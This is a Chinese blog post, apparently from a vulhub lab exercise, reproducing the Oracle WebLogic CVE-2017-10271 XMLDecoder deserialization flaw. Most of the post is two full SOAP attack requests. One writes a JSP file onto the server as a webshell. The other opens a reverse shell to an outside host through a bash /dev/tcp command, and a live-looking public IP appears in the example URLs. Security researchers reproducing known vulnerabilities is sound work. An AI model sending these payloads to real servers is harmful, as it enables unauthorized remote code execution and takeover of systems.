Weblogic CVE-2017-10271漏洞復(fù)現(xiàn)

原理:CVE-2017-10271漏洞主要是由WebLogic Server WLS組件遠(yuǎn)程命令執(zhí)行漏洞,主要由wls-wsat.war觸發(fā)該漏洞,觸發(fā)漏洞url如下:?http://101.32.30.69:7001/wls-wsat/CoordinatorPortType? post數(shù)據(jù)包,通過構(gòu)造構(gòu)造SOAP(XML)格式的請求,在解析的過程中導(dǎo)致XMLDecoder反序列化漏洞。

環(huán)境:vulhub

影響范圍:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。

驗(yàn)證截圖:


寫入webs hell

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: your-ip:7001

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: text/xml

Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

? ? <soapenv:Header>

? ? <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

? ? <java><java version="1.4.0" class="java.beans.XMLDecoder">

? ? <object class="java.io.PrintWriter">

? ? <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>

? ? <void method="println"><string>

? ? <![CDATA[

<% out.print("test"); %>

? ? ]]>

? ? </string>

? ? </void>

? ? <void method="close"/>

? ? </object></java></java>

? ? </work:WorkContext>

? ? </soapenv:Header>

? ? <soapenv:Body/>

</soapenv:Envelope>


訪問

http://101.32.30.69:7001/bea_wls_internal/test.jsp

反彈shell方法

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: your-ip:7001

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: text/xml

Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.4.0" class="java.beans.XMLDecoder">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/10.0.0.1/21 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></void>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>




?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 鄭重聲明:所用漏洞環(huán)境為自建虛擬機(jī)vulnhub靶機(jī)環(huán)境,僅供本人學(xué)習(xí)使用。 漏洞簡述 Weblogic的WLS ...
    M0nkeyK1ng閱讀 448評論 0 0
  • 沒有過多涉及原理和分析,只是作為記錄,免得一問三不知。 T3協(xié)議 什么是RMI:遠(yuǎn)程方法調(diào)用(Remote Met...
    jjf012閱讀 7,170評論 1 5
  • 久違的晴天,家長會(huì)。 家長大會(huì)開好到教室時(shí),離放學(xué)已經(jīng)沒多少時(shí)間了。班主任說已經(jīng)安排了三個(gè)家長分享經(jīng)驗(yàn)。 放學(xué)鈴聲...
    飄雪兒5閱讀 7,788評論 16 22
  • 今天感恩節(jié)哎,感謝一直在我身邊的親朋好友。感恩相遇!感恩不離不棄。 中午開了第一次的黨會(huì),身份的轉(zhuǎn)變要...
    余生動(dòng)聽閱讀 10,798評論 0 11
  • 可愛進(jìn)取,孤獨(dú)成精。努力飛翔,天堂翱翔。戰(zhàn)爭美好,孤獨(dú)進(jìn)取。膽大飛翔,成就輝煌。努力進(jìn)取,遙望,和諧家園??蓯塾巫?..
    趙原野閱讀 3,443評論 1 1

友情鏈接更多精彩內(nèi)容